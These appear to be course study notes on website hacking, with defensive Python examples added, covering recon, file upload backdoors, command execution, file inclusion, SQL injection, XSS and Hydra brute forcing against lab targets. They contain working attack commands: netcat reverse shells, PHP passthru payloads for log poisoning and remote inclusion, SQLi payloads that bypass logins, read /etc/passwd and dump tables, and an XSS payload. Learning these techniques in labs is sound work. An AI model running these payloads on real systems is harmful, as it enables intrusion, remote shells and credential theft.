Website Hacking

Information Gathering

  • IP Address

  • Domain name info

  • Technologies used

  • Other websites on the same server

  • DNS records

  • Unlisted files, sub-domains, directories

  1. Whois lookup - find info about the owner of the target

  2. Netcraft Site Report - shows technologies used on the target

  3. Robtex DNS lookup - shows comprehensive info about the target website

Websites on the Same Server

  • One server can serve a number of websites

  • Gaining access to one can help gain access to others

To find websites on the same server:

  1. Use robtex DNS lookup under “names pointing to the same IP”

  2. Using bing.com, search for ip:[target ip]

Discovering Subdomains

Knock can be used to find subdomains of the target, which helps to:

  1. Discover more information

  2. Discover new web applications

  3. Increase attack surface

  4. Discover management areas

  5. Beta / experimental features

knockpy google.com

Files and Directories

  • Find files and directories in the target website

  • Use a tool called dirb

    • dirb [target] [wordlist] [options]

Exploitation

File Upload Vulnerabilities

  • A simple type of vulnerability

  • Allow users to upload executable files such as PHP

Upload a PHP shell or backdoor, e.g. weevely

  1. Generate backdoor: weevely generate [password] [filename]

  2. Upload the generated file

  3. Connect to it: weevely [url to file] [password]

  4. Find out how to use it: weevely help

Code Execution Vulnerabilities

  • If there's a command execution box or similar input

  • Allows an attacker to execute OS commands

  • Windows or linux commands

  • Can be used to get a reverse shell

  • Or upload any file using the wget command

  • Code execution commands attached in the resources

# Listen on your machine on port 8080
nc -vv -l -p 8080

# Run this on the remote machine with your machine's IP: it connects back from the remote machine to your machine
nc -e /bin/sh 10.20.14.203 8080

Local File Inclusion

  • If there's a URL like this: ?page=include.php

  • Allows an attacker to read any file on the same server

  • Access files outside www directory

Shell from LFI

  • Try to inject code into readable files

  • Example:

    • /proc/self/environ

# with Burp Suite, modify the User-Agent header to:
<?passthru("nc -e /bin/sh 10.20.14.208 8888");?>

    • /var/log/auth.log

# encode this with base64
ssh "<?passthru('nc -e /bin/sh 10.20.14.208 8888');?>"@10.20.14.210

# encode with Burp Suite like this:
ssh "<?passthru(base64_decode('dkfhewkhohwkeff'));?>"@10.20.14.210

    • /var/log/apache2/access.log

Remote File Inclusion

  • If there's a URL like this: ?page=include.php, put in /?page=http://10.20.14.203/reverse.txt

  • Similar to local file inclusion

  • But allows the attacker to read any file from any server

  • Execute php files from other servers on the current server

  • Store php files on other servers as .txt

/etc/php5/cgi/php.ini
    allow_url_fopen = on
    allow_url_include = on

<?php
// save this as a .txt file on a web server you control (Kali ships one)
passthru("nc -e /bin/sh 10.20.14.203 8080");
?>

Mitigation

  1. File Upload Vulns - only allow safe files to be uploaded

  2. Code Execution Vulns

    • Don't use dangerous functions

    • Filter user input before execution

  3. File inclusion

    • Disable allow_url_fopen and allow_url_include

    • Use static file inclusion

SQL Injection

  1. They are everywhere

  2. Give access to the database - sensitive data

  3. Can be used to read local files outside www root

  4. Can be used to log in as admin and further exploit system

  5. Can be used to upload files

Discovering SQLi in POST

# use a single quote when logging in to see the code
# use and 1=1
# and 1=0 to see if that works in the case of blind sql injection
# aNd 111=111
# OrDeR bY 1

# input your code like this in the password field:
123456' code here#
# bypass need for password in the password field
aaa' or 1=1 #

# bypass need for password in the username field
admin' #
# You can do the same with URLs if the URL has ?page=user-info.php&username=caleb
# you can inject ?page=user-info.php&username=caleb' order by 1#
# union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'
# union select 1,column_name,null,null,5 from information_schema.columns where table_name = 'accounts'
# union select 1,username,password,is_admin,5 from accounts
# union select null,load_file('/etc/passwd'),null,null,null
# union select null,'example  example',null,null,null into outfile '/var/www/mutillidae/example.txt'
# uNiOn/**/sElEcT/**/1,2/**/%23

Exploitation

  • SQLMap was designed to exploit sql injections

  • Works with many DB types, mysql, mssql, etc.

  • Can be used to perform everything we learned and more

sqlmap --help

# use the full URL, including the query string that comes after it
sqlmap -u [target url]

# Get the dbs
sqlmap -u URL --dbs

# Current user, database, tables, columns, data
sqlmap -u URL --current-user
sqlmap -u URL --current-database
sqlmap -u URL --tables -D owasp10
sqlmap -u URL --columns -T accounts -D owasp10
sqlmap -u URL -T accounts -D owasp10 --dump

Preventing SQLi

  • Filters can be bypassed

  • Use black list of commands? Still can be bypassed

  • Use whitelist? Same issue

  • Use parameterized statements, separate data from SQL code

$stmt = $db->prepare("select * from accounts where username = ?");
$stmt->execute(array("admin' union select #"));  // the injection is bound as plain data, not SQL
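The same idea in Python, as an added example that is not from the notes: the concatenated query is fooled by the login bypass from the POST section, the parameterized one is not. SQLite is used so it runs anywhere; its comment marker is `--`, where MySQL also accepts `#`, so the payloads below end in `--`. The table contents are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the accounts table in the notes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT, is_admin INTEGER)")
    db.execute("INSERT INTO accounts VALUES ('admin', 's3cret', 1), ('caleb', 'pw', 0)")
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str):
    # The input is pasted into the SQL text, so a quote in it ends the string
    # literal and whatever follows is parsed as SQL.
    sql = ("SELECT username, is_admin FROM accounts "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchone()


def login_parameterized(db: sqlite3.Connection, username: str, password: str):
    # Placeholders: the SQL text is fixed, the values travel separately and are
    # compared as data, so a quote in them is just a quote.
    sql = "SELECT username, is_admin FROM accounts WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()
```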

XSS Vulnerabilities

  • Allow an attacker to inject javascript code into the page

  • Code is executed when the page loads

  • Code is executed on the client machine not the server

Three main types:

  1. Persistent/stored XSS

  2. Reflected XSS

  3. DOM based XSS

Discovering XSS

Reflected XSS

  • Non-persistent, not stored.

  • Only works if the target visits a specially crafted URL

  • http://target.com/page.php?something=<script>alert("XSS")</script>

  • <script>alert("XSS")</script>

Stored XSS

  • Persistent, stored on the page or DB

  • The injected code is executed every time the page is loaded

Exploiting XSS

  • Run any javascript code

  • The BeEF framework can be used to hook targets

  • Inject the BeEF hook into vulnerable pages

  • Execute code from BeEF

Preventing XSS Vulns

  • Minimise the use of user input in HTML

  • Escape any untrusted input before inserting it into the page
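An added Python example (not from the notes) showing the reflected payload from the Discovering XSS section inserted raw and then escaped, in both element text and a quoted attribute; the page layout and parameter name are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit


def param_from_url(url: str, name: str) -> str:
    """Pull one query parameter out of a URL (first value, '' if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_unsafe(something: str) -> str:
    # The parameter is reflected straight into the markup, so <script> in it runs.
    return f"<p>You searched for: {something}</p>"


def render_escaped(something: str) -> str:
    # html.escape turns < > & " ' into entities: the browser shows text, not tags.
    # quote=True is what makes the value safe inside the quoted attribute too.
    # This covers HTML text and attribute contexts only, not JavaScript or URLs.
    safe = html.escape(something, quote=True)
    return (f"<p>You searched for: {safe}</p>\n"
            f'<input type="text" name="something" value="{safe}">')
```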

Brute Force & Dictionary Attacks

  • Crunch can be used to create a wordlist

  • Syntax: crunch [min] [max] [characters] -t [pattern] -o [FileName]

  • example: crunch 6 8 123abc$ -o wordlist -t a@@@@b

Hydra

  • Hydra is a bruteforce tool that can be used to bruteforce almost any authentication service

  • Syntax: hydra [IP] -L [usernames] -P [passwords] [service]

  • Example: hydra 10.20.14.212 -l admin -P /root/wordlist.txt http-post-form "mutillidae/?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:F=Not Logged In"
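From the defender's side, as an added example not from the notes: detection logic that flags hosts sending many POSTs to the login form from the Hydra example within a short window, run over constructed Apache access-log lines. The log format, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format; the login path is the one in the Hydra example.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
LOGIN_PATH = "/mutillidae/?page=login.php"


def parse_line(line: str):
    """Return (ip, timestamp, method, path, status) or None for a malformed line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)


def find_bruteforce(lines, threshold: int = 10, window_s: int = 60) -> dict:
    """Map each client IP to its peak number of login POSTs inside any
    window_s-second window, keeping only those that reach threshold."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == LOGIN_PATH:
            posts[rec[0]].append(rec[1])
    hits = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over the timestamps
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[ip] = max(hits.get(ip, 0), count)
    return hits


def sample_log() -> list:
    """Constructed lines: 12 login POSTs in 12 seconds from one host, 2 from a normal user."""
    fmt = '{ip} - - [{t}] "POST /mutillidae/?page=login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"'
    lines = [fmt.format(ip="10.20.14.203", t=f"03/Mar/2024:10:00:{s:02d} +0000") for s in range(12)]
    lines += [fmt.format(ip="10.20.14.50", t=f"03/Mar/2024:10:0{m}:00 +0000") for m in (1, 5)]
    return lines
```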

Discovering Vulnerabilities Automatically

Zed Attack Proxy (ZAP)

  • Automatically find vulnerabilities in web applications

  • free and easy to use

  • can also be used for manual testing

Pentest Methodology

  • Info Gathering

  • For every domain / subdomain

    • click on every link

      • for every link

        • test parameters